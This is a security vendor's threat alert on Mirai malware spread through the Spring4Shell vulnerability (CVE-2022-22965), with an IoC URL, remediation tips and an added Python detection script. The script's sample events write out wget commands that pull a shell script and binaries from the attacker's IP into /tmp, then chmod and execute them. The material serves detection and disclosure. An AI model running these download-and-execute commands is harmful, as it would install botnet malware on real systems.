Rewterz Threat Alert – Mirai Botnet Spread Using Spring4Shell Exploit – Active IOCs

April 11, 2022

Severity

High

Analysis Summary

CVE-2022-22965

Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux.

Note: This vulnerability is also known as Spring4Shell or SpringShell.

The RCE vulnerability gives threat actors full access to the compromised devices, making it a dangerous and critical vulnerability. Spring4Shell is being actively exploited by threat actors to execute and weaponize the Mirai malware. This exploitation mainly occurred in the Singapore region. The sample is first downloaded into the “/tmp” folder and, once the permission change is executed with “chmod”, it becomes executable. Later, the “wget.sh” script downloads the binaries from the attacker’s server and executes the samples.
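A detection-oriented illustration of the delivery chain described above, added here and not part of the Rewterz advisory: it replays constructed auditd-style process events and flags the drop-into-/tmp, chmod, execute sequence per user, plus any command line that contacts the host listed in the advisory's URL indicator. The event format, the uid field and the helper names are assumptions.

```python
import re
from collections import defaultdict

# Host from the advisory's URL indicator (defanged there as 45[.]95[.]169[.]143); refanged for matching.
IOC_HOST = "45.95.169.143"

# Constructed sample of execve events, one per line: "<epoch> <uid> <cwd> <exe> <args...>".
# Made-up lines in an auditd-like shape, not real telemetry.
SAMPLE_EVENTS = """\
1649671201 1001 /opt/tomcat /usr/bin/java -jar app.war
1649671240 1001 /opt/tomcat /usr/bin/wget -O /tmp/wget.sh http://45.95.169.143/The420smokeplace.dns/wget.sh
1649671241 1001 /opt/tomcat /bin/chmod +x /tmp/wget.sh
1649671242 1001 /opt/tomcat /bin/sh /tmp/wget.sh
1649671243 1001 /tmp /usr/bin/wget http://45.95.169.143/The420smokeplace.dns/x86
1649671244 1001 /tmp /bin/chmod 777 /tmp/x86
1649671245 1001 /tmp /tmp/x86
1649680000 0 /root /usr/bin/apt-get update
"""

DOWNLOADERS = {"wget", "curl"}
TMP_PATH = re.compile(r"(^|\s)/tmp/\S+")  # any argument that points into /tmp


def parse_events(text):
    """Yield (ts, uid, cwd, exe, args) tuples from the sample format above."""
    for line in text.splitlines():
        ts, uid, cwd, exe, *args = line.split()
        yield int(ts), uid, cwd, exe, args


def detect_chain(text):
    """Return findings as (ts, uid, kind, command) for the /tmp drop -> chmod -> exec chain and IoC contact."""
    stage = defaultdict(int)  # uid -> 0 nothing, 1 file dropped in /tmp, 2 chmod applied to a /tmp file
    findings = []
    for ts, uid, cwd, exe, args in parse_events(text):
        cmd = " ".join([exe, *args])
        if IOC_HOST in cmd:
            findings.append((ts, uid, "ioc_host", cmd))
        name = exe.rsplit("/", 1)[-1]
        if name in DOWNLOADERS and (TMP_PATH.search(cmd) or cwd == "/tmp"):
            stage[uid] = max(stage[uid], 1)          # download landing in /tmp
        elif name == "chmod" and TMP_PATH.search(cmd) and stage[uid] >= 1:
            stage[uid] = 2                           # permission change on the dropped file
        elif stage[uid] == 2 and (exe.startswith("/tmp/") or TMP_PATH.search(cmd)):
            findings.append((ts, uid, "tmp_drop_chmod_exec", cmd))
            stage[uid] = 0                           # reset so a second payload is reported too
    return findings
```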

Impact

  • Server Outage
  • Data Loss
  • Website Downtime

Indicators of Compromise

URL

  • http[:]//45[.]95[.]169[.]143/The420smokeplace[.]dns/

Remediation

  • Upgrade your operating system.
  • Don’t open files and links from unknown sources.
  • Install and run anti-virus scans.